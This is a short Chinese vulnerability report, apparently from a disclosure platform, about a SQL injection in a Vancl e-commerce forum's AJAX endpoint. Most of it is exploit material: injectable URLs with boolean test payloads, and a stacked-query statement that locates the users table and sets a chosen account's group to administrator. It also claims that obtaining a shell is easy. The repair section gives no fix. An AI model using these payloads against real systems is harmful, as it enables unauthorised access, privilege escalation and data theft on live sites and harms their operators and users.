再暴差不多同样的SQL注入 漏洞 。 注入地址: http://bbs.vancl测试数据/space/manage/ajax. asp x?AjaxTemplate=admin/usercontrols/ajaxtopicinfo.ascx&poster=1') and 1=1-- http://bbs.vancl测试数据/space/manage/ajax.aspx?AjaxTemplate=admin/usercontrols/ajaxtopicinfo.ascx&poster=1') and 1=2-- 可以直接执行,拿Shell 不在话下哦,呵呵。。。 这里就不演试了,SQL注入对了电商来说,是很高的安全漏洞。。。。数据伤不起。。。 附上利用语句: ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1');declare @t nvarchar(40) select @t=(select top 1 name from sysobjects where name like'%_users' and xtype='U') exec('update '%2b@t%2b' set groupid=1 where username=''xxxx''')-- 取得密或提权。。。 漏洞证明: 修复方案: 您懂得! 作者:Jannock
查看更多关于凡客诚品某频道再暴SQL注入漏洞及修复 - 网站安的详细内容...